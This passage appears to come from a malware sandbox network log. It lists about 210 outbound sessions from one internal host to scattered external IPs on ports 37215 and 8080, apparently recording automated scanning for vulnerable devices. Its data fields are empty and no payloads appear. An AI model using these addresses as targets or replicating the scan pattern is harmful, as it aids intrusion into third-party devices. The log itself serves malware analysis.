                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33996192.168.2.236030841.252.13.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33997192.168.2.235446441.207.50.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33998192.168.2.233443041.223.202.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33999192.168.2.234666641.84.89.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34000192.168.2.2332938157.154.165.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34001192.168.2.2358978197.81.79.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34002192.168.2.2353362157.113.14.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34003192.168.2.2338308197.28.165.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34004192.168.2.2350088197.23.196.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34005192.168.2.2334910107.249.111.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34006192.168.2.2351132197.118.188.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34007192.168.2.2340036157.246.75.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34008192.168.2.2337734216.214.171.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34009192.168.2.2350518158.129.218.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34010192.168.2.2336804197.50.180.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34011192.168.2.233845841.172.32.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34012192.168.2.2347862113.179.157.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34013192.168.2.2357850157.139.185.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34014192.168.2.2348642106.233.241.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34015192.168.2.235627041.251.165.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34016192.168.2.234352850.18.11.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34017192.168.2.2359464130.188.76.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34018192.168.2.2351728157.212.152.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34019192.168.2.234859441.229.73.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34020192.168.2.2349520157.183.35.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34021192.168.2.2335288154.134.247.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34022192.168.2.233522241.185.173.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34023192.168.2.235844841.245.26.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34024192.168.2.234420041.247.9.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34025192.168.2.2340380197.176.250.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34026192.168.2.234026441.156.200.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34027192.168.2.234636841.16.59.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34028192.168.2.2344956197.7.67.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34029192.168.2.234842441.113.189.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34030192.168.2.2344382197.77.156.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34031192.168.2.234413441.23.153.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34032192.168.2.233613641.175.23.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34033192.168.2.2358758157.103.19.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34034192.168.2.235667241.216.42.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34035192.168.2.2335054213.96.246.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34036192.168.2.2352676197.113.237.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34037192.168.2.234093441.254.104.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34038192.168.2.234891841.189.211.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34039192.168.2.235356841.17.40.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34040192.168.2.2336906118.176.57.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34041192.168.2.2332802197.167.33.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34042192.168.2.2360854106.117.199.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34043192.168.2.234439641.207.122.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34044192.168.2.233713425.250.133.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34045192.168.2.2346820122.39.87.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34046192.168.2.2341296197.189.125.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34047192.168.2.235464235.50.142.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34048192.168.2.234024441.34.6.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34049192.168.2.234529658.45.232.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34050192.168.2.2338558159.114.190.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34051192.168.2.2345746157.191.204.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34052192.168.2.2350142122.115.145.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34053192.168.2.2355930157.107.171.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34054192.168.2.235120841.112.11.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34055192.168.2.234476436.228.23.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34056192.168.2.2358998200.25.56.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34057192.168.2.2341388115.24.105.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34058192.168.2.2358396157.176.54.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34059192.168.2.2355682157.52.96.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34060192.168.2.233379266.53.188.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34061192.168.2.2359042150.140.61.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34062192.168.2.2333118157.71.88.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34063192.168.2.2359148197.41.238.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34064192.168.2.2333818119.130.195.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34065192.168.2.2339284157.108.11.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34066192.168.2.235703841.42.249.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34067192.168.2.234770041.192.139.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34068192.168.2.2335732204.251.42.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34069192.168.2.2358312102.56.150.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34070192.168.2.235542058.221.145.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34071192.168.2.2346806157.131.25.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34072192.168.2.2340356197.98.94.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34073192.168.2.2336752157.196.214.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34074192.168.2.233970641.36.9.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34075192.168.2.233714641.72.157.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34076192.168.2.233294441.119.234.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34077192.168.2.234602441.162.159.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34078192.168.2.2349770197.144.169.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34079192.168.2.2353456157.243.92.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34080192.168.2.234059041.212.29.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34081192.168.2.2345872157.102.127.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34082192.168.2.235036841.238.199.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34083192.168.2.2344810157.237.64.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34084192.168.2.234085641.56.188.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34085192.168.2.2350368157.118.70.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34086192.168.2.23553465.107.101.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34087192.168.2.2334066197.253.16.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34088192.168.2.233597864.172.64.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34089192.168.2.234552223.236.80.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34090192.168.2.2347278157.3.242.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34091192.168.2.2346986146.213.247.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34092192.168.2.2359760157.228.2.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34093192.168.2.2346100129.255.145.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34094192.168.2.234166453.176.69.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34095192.168.2.235024074.169.206.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34096192.168.2.233386643.79.124.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34097192.168.2.2348168136.233.54.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34098192.168.2.2359494206.224.154.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34099192.168.2.2342070158.235.104.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34100192.168.2.235830273.42.183.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34101192.168.2.2335606134.15.15.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34102192.168.2.235481825.66.187.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34103192.168.2.233984823.26.80.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34104192.168.2.2359354113.243.110.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34105192.168.2.234376645.217.68.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34106192.168.2.2338640177.218.202.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34107192.168.2.235921499.153.212.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34108192.168.2.2357720188.13.166.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34109192.168.2.234115883.58.46.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34110192.168.2.2344240131.32.237.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34111192.168.2.234030480.85.127.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34112192.168.2.2351660189.121.85.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34113192.168.2.2356710220.224.236.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34114192.168.2.23375345.135.178.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34115192.168.2.235359820.189.14.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34116192.168.2.2345272148.130.101.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34117192.168.2.23525764.194.118.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34118192.168.2.2351882209.198.56.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34119192.168.2.234971075.2.225.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34120192.168.2.233378866.67.196.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34121192.168.2.2347472199.92.188.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34122192.168.2.2354778122.164.202.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34123192.168.2.2355972177.189.179.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34124192.168.2.234161827.41.173.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34125192.168.2.234814299.110.223.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34126192.168.2.2338330134.242.108.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34127192.168.2.233436239.153.97.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34128192.168.2.2335044177.167.71.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34129192.168.2.2352674192.83.82.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34130192.168.2.234355059.230.213.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34131192.168.2.2348484153.115.205.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34132192.168.2.233492652.120.200.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34133192.168.2.2341428155.79.125.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34134192.168.2.2353080199.53.34.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34135192.168.2.2355856128.154.208.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34136192.168.2.2356694175.35.199.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34137192.168.2.2354578116.181.31.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34138192.168.2.234014225.90.111.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34139192.168.2.2353122193.161.12.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34140192.168.2.2354116105.126.26.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34141192.168.2.2337074134.228.173.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34142192.168.2.2356442106.229.97.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34143192.168.2.235930477.243.128.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34144192.168.2.2345204155.87.180.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34145192.168.2.2347630129.145.18.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34146192.168.2.2351958147.151.138.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34147192.168.2.2347664187.25.170.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34148192.168.2.234278497.196.222.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34149192.168.2.233585075.167.212.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34150192.168.2.2356676144.141.69.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34151192.168.2.234478863.123.138.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34152192.168.2.2357058203.221.200.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34153192.168.2.2338246135.123.88.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34154192.168.2.235026642.66.3.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34155192.168.2.23378581.46.108.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34156192.168.2.2350832167.75.184.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34157192.168.2.23530305.162.71.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34158192.168.2.234048279.182.108.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34159192.168.2.2348216179.8.20.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34160192.168.2.2335222140.174.192.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34161192.168.2.234320280.13.52.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34162192.168.2.2351596159.91.85.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34163192.168.2.2358912219.133.93.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34164192.168.2.233912643.38.169.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34165192.168.2.2350188189.244.89.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34166192.168.2.2360008200.11.162.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34167192.168.2.2357744131.205.68.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34168192.168.2.2346478148.1.225.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34169192.168.2.235736240.84.1.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34170192.168.2.2357526221.156.114.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34171192.168.2.234885642.199.6.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34172192.168.2.235534846.168.171.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34173192.168.2.2332792184.161.182.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34174192.168.2.2337940147.190.153.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34175192.168.2.2334952101.12.103.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34176192.168.2.2350070155.71.44.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34177192.168.2.2333136216.62.49.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34178192.168.2.234758282.165.157.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34179192.168.2.2359744133.153.250.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34180192.168.2.2335360185.151.31.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34181192.168.2.2336550198.143.171.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34182192.168.2.2358772186.53.20.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34183192.168.2.2342068177.178.187.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34184192.168.2.2339456200.98.212.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34185192.168.2.234018217.170.154.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34186192.168.2.235722240.183.35.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34187192.168.2.2352754117.162.51.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34188192.168.2.233765879.58.48.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34189192.168.2.2351270132.73.125.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34190192.168.2.233818695.1.187.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34191192.168.2.234906285.116.141.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192192.168.2.235652470.71.39.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34193192.168.2.2336854175.187.132.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34194192.168.2.2357898178.40.224.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34195192.168.2.2342366223.119.211.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34196192.168.2.233812071.139.50.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34197192.168.2.2338114183.14.221.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34198192.168.2.235374085.119.225.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34199192.168.2.234251244.153.106.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34200192.168.2.2351668209.60.100.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34201192.168.2.2332784175.57.207.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34202192.168.2.235338019.90.138.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34203192.168.2.233533896.171.134.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34204192.168.2.23504082.18.133.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34205192.168.2.235636892.61.109.1728080
                                                        TimestampBytes transferredDirectionData


